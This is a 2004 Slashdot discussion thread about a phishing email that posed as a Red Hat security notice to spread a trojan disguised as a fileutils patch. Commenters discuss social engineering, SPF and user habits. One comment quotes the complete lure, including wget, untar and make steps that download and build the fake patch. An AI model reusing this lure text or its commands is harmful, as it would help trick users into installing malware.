Beware 'Fedora-Redhat' Fake Security Alert 628
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
We knew this day would come (Score:4, Insightful)
About Time (Score:4, Insightful)
wont work (Score:3, Insightful)
Real link? (Score:5, Insightful)
Security only works when you know what to check (Score:4, Insightful)
However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
Confidence (Score:3, Insightful)
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.
Re:Source code! (Score:1, Insightful)
Re: text (Score:5, Insightful)
does it or not ? (Score:2, Insightful)
Either it is malicious or not.
Don't they know ?
If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.
What the definition of 'malicious code' anyway ?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.
Christ, they didn't do a very good job... (Score:5, Insightful)
Re:Here's what WHOIS says: (Score:3, Insightful)
And so... (Score:2, Insightful)
heh, maybe it won't be for long with the
Re: text (Why? Because.) (Score:5, Insightful)
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Re:Use SPF to protect yourself from phishing (Score:3, Insightful)
Re:Christ, they didn't do a very good job... (Score:3, Insightful)
Re:Security only works when you know what to check (Score:2, Insightful)
Yet that hasn't stopped Windows from being ready for "desktop primetime" huh? There will always be dumb-witted joe users that will get burnt from these lame social engineering scams regardless of the OS. These very well could be the same people who will be taking advantage of offline as well. Linux is already on the desktop. It has been ready for primetime for awhile. Of course there is nothing it can do to protect the user from the biggest security threat of them all: the user themselves.
Re:okay, heres the plan... (Score:2, Insightful)
Re:bastards (Score:5, Insightful)
Re: text (Why? Because.) (Score:5, Insightful)
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
Re:We knew this day would come (Score:4, Insightful)
Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.
Re:I love it! (Score:3, Insightful)
A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...
On computer geeks, need to know how things work naturally becomes directed towards computers...
This should be a mandatory feature (Score:1, Insightful)
Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.
It would be even better if you could use it as a rule to manage messages - ie immediately trash spoffed messages without presenting them to the end user.
Given the (lack of) speed with which ISP's are implementing SPF doing it at the MUA end is a great stopgap.
Please submit it - it's a damn fine idea.
Re:Looks to be a Klik client? (Score:3, Insightful)
It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.
Re: I'll try it... Execution results! (Score:1, Insightful)
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar
* Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
The interesting thing is the link that is listed to download the trojan. Its the Stanford website. The person who owns
Re:I love it! (Score:4, Insightful)
You don't want a cure for this.
If you want a legitimate comparison between Linux and Windows security, observe:
This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".
Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slachdot (compared to 1 day before).
Re:We knew this day would come (Score:3, Insightful)
> if all people had:
>
> 1) Startup Monitor - Painfully simple, no one
> should be without it.
I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.
Malware: Do you want to install this nasty browser hijacker?
n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!
> 2) Kerio Personal Firewall, or equivalent
Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00bs PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the the corner then they are not gonna accidently screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.
Malware: Tries to 'phone home'
ZoneAlarm: Do you want to let application porn2u.exe have access to the internet?
n00b: Yes goddammit, and stop bugging me already!
> 3) An executable monitor as described above.
I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager? Most clueless n00bs are not capable of comprehending what task manager is showing them. There are too many "good" processes that are virtually unidentifiable listed.
Re: I'll try it... Execution results! (Score:3, Insightful)
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)
Re:We knew this day would come (Score:3, Insightful)
The trouble again would be that most clueless users won't understand what the window asking;
Do you want to allow application
"W1NPR0C32.EXE" to execute?
[YES] [NO]
means, which leads to the same "yes click reflex" problem I described above.
It is a problem, because no matter what you do, there is always going to be a group of numbnuts out there who will click yes on anything that pops up. Often, they won't even read what it says. Any solution that produces even greater numbers of YES/NO dialogues will only serve to make the problem worse I'm afraid.
The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.
This can be acheived in theory by running Windows under a restricted user policy but in practice it doesn't work because too many programmers are too lazy to write their programs to run with anything other than "administrator" priveleges, so we are stuck with a dilemma that will be hard to overcome.
Re:text of site (Score:1, Insightful)
>doesn't belong to RedHat? This is social engineering at its finest.
At it's finest? Who the hell are you kidding. This is a sample of social engineering yes... but... my god it's far from being the cream of the crop. Way way way to many simple mistakes.
Show's lack for attention to detail. Bad grammar, Taiwan mail relay, no up2date source...... screams amature...
Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease at which email headers can be faked.... this doesn't even register on the talent meter of social engineering.
Re:Christ, they didn't do a very good job... (Score:2, Insightful)
It's a common bad habit usually done to satisfy the ego of the admin. Most Red Hat customers use the distro because of the support arrangements available. That support, which doesn't exist for third party packages (including 'roll their own') is more valuable than the ego boost the admin gets from doing things themselves.
If you go replacing your packages with third party ones, you also miss out on a lot of the effort that Red Hat put into backporting security fixes. Does that Apache security fix change the format of module files? Not if you're running Red Hat's Apache package, it doesn't. If you're running something else, either backport it yourself (most people who have the skills to do that decide to let Red Hat do it for them) or update every module you're using.
Re:text of site (Score:1, Insightful)
Oh but it does! Stop being an ass and look around you. Not everyone is an expert RedHat administrator. Not everyone is paranoid enough to check the headers of every email their receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.
Re:text of site (Score:3, Insightful)
Yes. At least in combination with the other glaring flaws I and others have already mentioned.
People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, what domains that are usually referenced to and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious to unsolicited messages of this kind.
There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.
It's social engineering all right. Just not at its finest.
WTF?? (Score:3, Insightful)
We're supposed to believe this?
Re: I'll try it... Execution results! (Score:3, Insightful)
Agreed, but it needs be very very careful as to any assumptions as to exactly which system it was that worked.
The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superor forces with inferior forces.
Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.